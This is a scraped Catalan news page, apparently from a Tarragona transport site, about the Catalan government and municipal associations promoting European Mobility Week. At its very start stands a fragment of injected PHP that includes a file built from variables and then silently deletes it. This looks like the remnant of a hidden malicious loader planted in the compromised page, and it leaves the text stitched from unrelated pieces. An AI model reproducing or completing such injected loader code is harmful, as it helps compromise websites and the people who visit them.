");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Territori, juntament amb l'ACM i la FMC impulsen la Setmana Europea de la Mobilitat
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Territori, juntament amb l'ACM i la FMC impulsen la Setmana Europea de la Mobilitat (20/07/2020)

El govern i les entitats municipalistes: l’Associació Catalana de Municipis i la Federació de Municipis de Catalunya, s’adhereixen a la Setmana Europea de la Mobilitat i es comprometen a treballar conjuntament per fomentar la mobilitat segura i sostenible.

El secretari d’Infraestructures i Mobilitat, Isidre Gavín, juntament amb el director general de Transports, David Saldoni, s’ha reunit amb la secretaria general de les dues entitats municipalistes per tal de concretar la coŀlaboració del Govern amb les entitats municipalistes de cara a la Setmana Europea de la Mobilitat, així com per nous projectes importants pels municipis catalans.

La pandèmia ha provocat canvis en la mobilitat i cap municipi de Catalunya no en queda al marge. Ara és un bon moment per aprofundir en els debats sobre la mobilitat arreu del país, i empendre accions. Els Ajuntaments de Catalunya han estat cabdals en la millora de l’urbanisme i el foment de la pacificació del trànsit, i l’impuls de bones mesures per a millorar la sostenibilitat en els desplaçaments dels seus ciutadans i ciutadanes i la millora de la qualitat de l’aire.

És per aquest motiu que des de la Generalitat es posa a disposició dels ajuntaments un catàleg d’accions per poder desenvolupar, ja sigui, implementar mesures de sensibilització, organitzar un dia sense cotxes, caminades, bicicletades, o activitats amb les escoles, com per exemple, anar caminant al cole, etc. però també mesures estructurals per pacificar el trànsit, fomentar els desplaçaments a peu, la mobilitat sostenible, la instaŀlació de carregadors elèctrics, entre d’altres.

Per tant, des del govern i des de les entitats municipalistes animem a tots els ajuntaments a sumar-s’hi i executar accions. Per adherir-se a la Setmana Europea de la Mobilitat els consistoris poden fer-ho a través d’un formulari a registration.mobilityweek.eu/, però també s’ofereix la possibilitat d’aprovar una moció, acordada amb les entitats municipalistes, per tal que puguem recollir les mesures que es porten a terme en el conjunt del país.

Font: Departament de Territori i Sostenibilitat

Territori, juntament amb l'ACM i la FMC impulsen la Setmana Europea de la Mobilitat

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona